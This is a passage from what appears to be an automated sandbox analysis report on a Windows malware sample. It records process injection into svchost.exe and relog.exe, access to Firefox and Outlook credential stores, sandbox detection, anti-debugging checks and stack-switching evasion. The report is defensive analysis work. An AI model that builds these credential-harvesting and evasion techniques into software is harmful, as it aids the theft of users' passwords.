                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: relog.exe, 00000006.00000003.2226934536.0000000003141000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3559238568.0000000003141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: BDlwy8b7Km.exeReversingLabs: Detection: 70%
                Source: unknownProcess created: C:\Users\user\Desktop\BDlwy8b7Km.exe "C:\Users\user\Desktop\BDlwy8b7Km.exe"
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BDlwy8b7Km.exe"
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeProcess created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
                Source: C:\Windows\SysWOW64\relog.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BDlwy8b7Km.exe"Jump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeProcess created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\relog.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: pdh.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\relog.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: BDlwy8b7Km.exeStatic file information: File size 1334784 > 1048576
                Source: BDlwy8b7Km.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: BDlwy8b7Km.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: BDlwy8b7Km.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: BDlwy8b7Km.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: BDlwy8b7Km.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: BDlwy8b7Km.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: BDlwy8b7Km.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: relog.pdbGCTL source: svchost.exe, 00000001.00000003.2013167163.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012121245.0000000003013000.00000004.00000020.00020000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000002.3559816137.00000000008F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: relog.pdb source: svchost.exe, 00000001.00000003.2013167163.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012121245.0000000003013000.00000004.00000020.00020000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000002.3559816137.00000000008F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FKUPIibLrFYhJ.exe, 00000005.00000002.3559491409.000000000068E000.00000002.00000001.01000000.00000005.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3558984084.000000000068E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: BDlwy8b7Km.exe, 00000000.00000003.1728807999.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, BDlwy8b7Km.exe, 00000000.00000003.1729354674.0000000004420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1948138991.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1945997974.0000000003200000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.000000000379E000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2047180919.0000000003455000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.0000000003600000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2044450674.0000000003281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BDlwy8b7Km.exe, 00000000.00000003.1728807999.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, BDlwy8b7Km.exe, 00000000.00000003.1729354674.0000000004420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2044447122.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1948138991.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1945997974.0000000003200000.00000004.00000020.00020000.00000000.sdmp, relog.exe, relog.exe, 00000006.00000002.3560587819.000000000379E000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2047180919.0000000003455000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.0000000003600000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2044450674.0000000003281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: relog.exe, 00000006.00000002.3559238568.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3561012961.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2342472948.0000000037D3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: relog.exe, 00000006.00000002.3559238568.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3561012961.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2342472948.0000000037D3C000.00000004.80000000.00040000.00000000.sdmp
                Source: BDlwy8b7Km.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: BDlwy8b7Km.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: BDlwy8b7Km.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: BDlwy8b7Km.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: BDlwy8b7Km.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005942DE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B0A76 push ecx; ret 0_2_005B0A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403280 push eax; ret 1_2_00403282
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414323 push cs; retf 1_2_0041436D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417BE2 push edi; iretd 1_2_00417BEC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417C30 push esi; ret 1_2_00417C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D5CD push es; ret 1_2_0040D5D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417DF9 push FFFFFF83h; retf 1_2_00417E04
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401753 push edi; retf 1_2_00401754
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360225F pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036027FA pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx1_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360283D push eax; iretd 1_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360135F push eax; iretd 1_2_03601369
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeCode function: 5_2_03B6D19E push FFFFFF83h; retf 5_2_03B6D1A9
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeCode function: 5_2_03B6CF87 push edi; iretd 5_2_03B6CF91
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeCode function: 5_2_03B6CFD5 push esi; ret 5_2_03B6CFD7
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeCode function: 5_2_03B674E2 push cs; retf 5_2_03B674E3
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036309AD push ecx; mov dword ptr [esp], ecx6_2_036309B6
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EF0267 push esp; ret 6_2_02EF026A
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EE4B76 push FFFFFF83h; retf 6_2_02EE4B81
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EE49AD push esi; ret 6_2_02EE49AF
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EE495F push edi; iretd 6_2_02EE4969
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EDDEE9 push ecx; retf 6_2_02EDDEF6
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0350511D push 00000036h; iretd 6_2_03505127
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0350577A push es; iretd 6_2_03505802
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03505701 push esp; ret 6_2_03505702
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_035057F4 push es; iretd 6_2_03505802
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03509F7E pushfd ; retf 6_2_03509F87
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0350EF1D push ds; ret 6_2_0350EF1F
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0350BFF6 push ss; ret 6_2_0350C00B
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03505FB6 push cs; retf 6_2_03505FB7
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005AF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005AF98E
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_00621C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00621C41
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97216
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeAPI/Special instruction interceptor: Address: 165CC14
                Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeAPI coverage: 3.8 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\relog.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\relog.exe TID: 7724Thread sleep count: 40 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\relog.exe TID: 7724Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe TID: 7748Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\relog.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_005FDBBE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_006068EE FindFirstFileW,FindClose,0_2_006068EE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0060698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0060698F
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005FD076
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005FD3A9
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_00609642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00609642
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0060979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0060979D
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_00609B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00609B2B
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_00605C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00605C97
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EEC330 FindFirstFileW,FindNextFileW,FindClose,6_2_02EEC330
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005942DE
                Source: FKUPIibLrFYhJ.exe, 00000007.00000002.3559905244.0000000000C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss0
                Source: relog.exe, 00000006.00000002.3559238568.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2345684003.0000021D37C8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417523 LdrLoadDll,1_2_00417523
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0060EAA2 BlockInput,0_2_0060EAA2
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005C2622
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005942DE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B4CE8 mov eax, dword ptr fs:[00000030h]0_2_005B4CE8
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0165CEE0 mov eax, dword ptr fs:[00000030h]0_2_0165CEE0
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0165CE80 mov eax, dword ptr fs:[00000030h]0_2_0165CE80
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0165B860 mov eax, dword ptr fs:[00000030h]0_2_0165B860
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]1_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8350 mov ecx, dword ptr fs:[00000030h]1_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370634F mov eax, dword ptr fs:[00000030h]1_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov ecx, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]1_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]1_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
